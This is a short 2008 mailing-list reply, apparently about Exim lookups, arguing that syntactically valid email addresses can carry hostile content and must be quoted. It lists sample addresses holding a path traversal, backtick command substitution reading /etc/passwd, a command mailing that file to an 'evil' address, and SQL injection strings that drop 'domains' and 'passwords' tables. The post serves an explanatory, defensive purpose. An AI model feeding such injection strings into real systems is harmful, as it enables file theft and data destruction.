On 2008-09-28 at 12:29 +0100, Andy Smith wrote:
> thanks, I had checked if " is a valid character for an email address and I
> dont think it is, but your solution is better as u never know who will break
> the rules ;)
It is valid. Left-hand sides can use double-quotes to expand the
available set of characters.
Valid email addresses (syntactically):
fred@???
"fred bloggs"@???
" fred "@???
""@???
a~`*&^%$#!._-={|}'/+?b@???
../etc/passwd@???
`cat%20/etc/passwd`@???
"cat /etc/passwd | Mail -s w00t evil@???
And in homage to
http://xkcd.com/327/ I offer:
"phil'); DROP TABLE domains; DROP TABLE passwords; --"@???
So yes, ${quote_<lookup-type>:<string>} is rather important to use.
Regards,
"X'); DROP TABLE domains; DROP TABLE passwords; --"@???
(yes, that address is valid and reaches me, and not via catchall)
